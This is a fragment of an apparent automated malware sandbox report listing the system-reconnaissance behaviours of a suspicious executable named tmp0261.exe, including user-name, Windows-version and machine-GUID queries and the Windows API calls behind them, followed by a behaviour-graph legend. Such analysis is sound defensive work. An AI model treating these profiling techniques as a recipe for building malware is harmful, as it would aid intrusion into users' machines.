Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B5CA7 AllocateAndInitializeSid,LookupAccountSidW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,FreeSid,CloseHandle,18_2_004B5CA7
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B3AB5 GetUserNameW,18_2_004B3AB5
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BE515 GetVersionExW,18_2_004BE515
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 102806